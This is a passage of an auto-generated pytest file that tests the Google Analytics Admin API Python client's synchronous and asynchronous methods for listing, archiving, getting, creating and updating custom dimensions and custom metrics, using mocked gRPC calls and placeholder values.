test_list_custom_dimensions(request_type=dict) def test_list_custom_dimensions_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: client.list_custom_dimensions() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomDimensionsRequest() @pytest.mark.asyncio async def test_list_custom_dimensions_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListCustomDimensionsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomDimensionsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_custom_dimensions(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomDimensionsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListCustomDimensionsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_custom_dimensions_async_from_dict(): await test_list_custom_dimensions_async(request_type=dict) def test_list_custom_dimensions_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListCustomDimensionsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: call.return_value = analytics_admin.ListCustomDimensionsResponse() client.list_custom_dimensions(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_custom_dimensions_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListCustomDimensionsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomDimensionsResponse() ) await client.list_custom_dimensions(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_custom_dimensions_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListCustomDimensionsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_custom_dimensions(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_custom_dimensions_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_custom_dimensions( analytics_admin.ListCustomDimensionsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_custom_dimensions_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListCustomDimensionsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListCustomDimensionsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_custom_dimensions(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_custom_dimensions_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_custom_dimensions( analytics_admin.ListCustomDimensionsRequest(), parent="parent_value", ) def test_list_custom_dimensions_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), resources.CustomDimension(), ], next_page_token="abc", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[], next_page_token="def", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[resources.CustomDimension(),], next_page_token="ghi", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_custom_dimensions(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.CustomDimension) for i in results) def test_list_custom_dimensions_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), resources.CustomDimension(), ], next_page_token="abc", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[], next_page_token="def", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[resources.CustomDimension(),], next_page_token="ghi", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), ], ), RuntimeError, ) pages = list(client.list_custom_dimensions(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_custom_dimensions_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), resources.CustomDimension(), ], next_page_token="abc", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[], next_page_token="def", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[resources.CustomDimension(),], next_page_token="ghi", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), ], ), RuntimeError, ) async_pager = await client.list_custom_dimensions(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.CustomDimension) for i in responses) @pytest.mark.asyncio async def test_list_custom_dimensions_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), resources.CustomDimension(), ], next_page_token="abc", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[], next_page_token="def", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[resources.CustomDimension(),], next_page_token="ghi", ), analytics_admin.ListCustomDimensionsResponse( custom_dimensions=[ resources.CustomDimension(), resources.CustomDimension(), ], ), RuntimeError, ) pages = [] async for page_ in (await client.list_custom_dimensions(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_archive_custom_dimension( transport: str = "grpc", request_type=analytics_admin.ArchiveCustomDimensionRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.archive_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ArchiveCustomDimensionRequest() # Establish that the response is the type that we expect. assert response is None def test_archive_custom_dimension_from_dict(): test_archive_custom_dimension(request_type=dict) def test_archive_custom_dimension_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: client.archive_custom_dimension() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ArchiveCustomDimensionRequest() @pytest.mark.asyncio async def test_archive_custom_dimension_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ArchiveCustomDimensionRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.archive_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ArchiveCustomDimensionRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_archive_custom_dimension_async_from_dict(): await test_archive_custom_dimension_async(request_type=dict) def test_archive_custom_dimension_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ArchiveCustomDimensionRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: call.return_value = None client.archive_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_archive_custom_dimension_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ArchiveCustomDimensionRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.archive_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_archive_custom_dimension_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.archive_custom_dimension(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_archive_custom_dimension_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.archive_custom_dimension( analytics_admin.ArchiveCustomDimensionRequest(), name="name_value", ) @pytest.mark.asyncio async def test_archive_custom_dimension_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.archive_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.archive_custom_dimension(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_archive_custom_dimension_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.archive_custom_dimension( analytics_admin.ArchiveCustomDimensionRequest(), name="name_value", ) def test_get_custom_dimension( transport: str = "grpc", request_type=analytics_admin.GetCustomDimensionRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", scope=resources.CustomDimension.DimensionScope.EVENT, disallow_ads_personalization=True, ) response = client.get_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetCustomDimensionRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomDimension) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.scope == resources.CustomDimension.DimensionScope.EVENT assert response.disallow_ads_personalization is True def test_get_custom_dimension_from_dict(): test_get_custom_dimension(request_type=dict) def test_get_custom_dimension_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: client.get_custom_dimension() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetCustomDimensionRequest() @pytest.mark.asyncio async def test_get_custom_dimension_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetCustomDimensionRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", scope=resources.CustomDimension.DimensionScope.EVENT, disallow_ads_personalization=True, ) ) response = await client.get_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetCustomDimensionRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomDimension) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.scope == resources.CustomDimension.DimensionScope.EVENT assert response.disallow_ads_personalization is True @pytest.mark.asyncio async def test_get_custom_dimension_async_from_dict(): await test_get_custom_dimension_async(request_type=dict) def test_get_custom_dimension_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetCustomDimensionRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: call.return_value = resources.CustomDimension() client.get_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_custom_dimension_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetCustomDimensionRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension() ) await client.get_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_custom_dimension_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_custom_dimension(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_custom_dimension_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_custom_dimension( analytics_admin.GetCustomDimensionRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_custom_dimension_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_custom_dimension(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_custom_dimension_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_custom_dimension( analytics_admin.GetCustomDimensionRequest(), name="name_value", ) def test_create_custom_metric( transport: str = "grpc", request_type=analytics_admin.CreateCustomMetricRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD, scope=resources.CustomMetric.MetricScope.EVENT, ) response = client.create_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateCustomMetricRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomMetric) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD assert response.scope == resources.CustomMetric.MetricScope.EVENT def test_create_custom_metric_from_dict(): test_create_custom_metric(request_type=dict) def test_create_custom_metric_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: client.create_custom_metric() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateCustomMetricRequest() @pytest.mark.asyncio async def test_create_custom_metric_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateCustomMetricRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD, scope=resources.CustomMetric.MetricScope.EVENT, ) ) response = await client.create_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateCustomMetricRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomMetric) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD assert response.scope == resources.CustomMetric.MetricScope.EVENT @pytest.mark.asyncio async def test_create_custom_metric_async_from_dict(): await test_create_custom_metric_async(request_type=dict) def test_create_custom_metric_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateCustomMetricRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: call.return_value = resources.CustomMetric() client.create_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_custom_metric_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateCustomMetricRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric() ) await client.create_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_custom_metric_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_custom_metric( parent="parent_value", custom_metric=resources.CustomMetric(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].custom_metric == resources.CustomMetric(name="name_value") def test_create_custom_metric_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_custom_metric( analytics_admin.CreateCustomMetricRequest(), parent="parent_value", custom_metric=resources.CustomMetric(name="name_value"), ) @pytest.mark.asyncio async def test_create_custom_metric_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_custom_metric( parent="parent_value", custom_metric=resources.CustomMetric(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].custom_metric == resources.CustomMetric(name="name_value") @pytest.mark.asyncio async def test_create_custom_metric_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_custom_metric( analytics_admin.CreateCustomMetricRequest(), parent="parent_value", custom_metric=resources.CustomMetric(name="name_value"), ) def test_update_custom_metric( transport: str = "grpc", request_type=analytics_admin.UpdateCustomMetricRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomMetric( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD, scope=resources.CustomMetric.MetricScope.EVENT, ) response = client.update_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomMetricRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomMetric) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD assert response.scope == resources.CustomMetric.MetricScope.EVENT def test_update_custom_metric_from_dict(): test_update_custom_metric(request_type=dict) def test_update_custom_metric_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: client.update_custom_metric() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomMetricRequest() @pytest.mark.asyncio async def test_update_custom_metric_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateCustomMetricRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_metric), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomMetric( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", measurement_unit=resources.CustomMetric.MeasurementUnit.STANDARD, scope=resources.CustomMetric.MetricScope.EVENT, ) ) response = await client.update_custom_metric(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomMetricRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomMetric) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.measurement_unit == resources.CustomMetric.MeasurementUnit.STANDARD assert response.scope == resources.CustomMetric.MetricScope.EVENT @pytest.mark.asyncio async def test_update_custom_metric_async_from_dict(): await test_update_custom_metric_async(request_type=dict) def test_update_custom_metric_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = 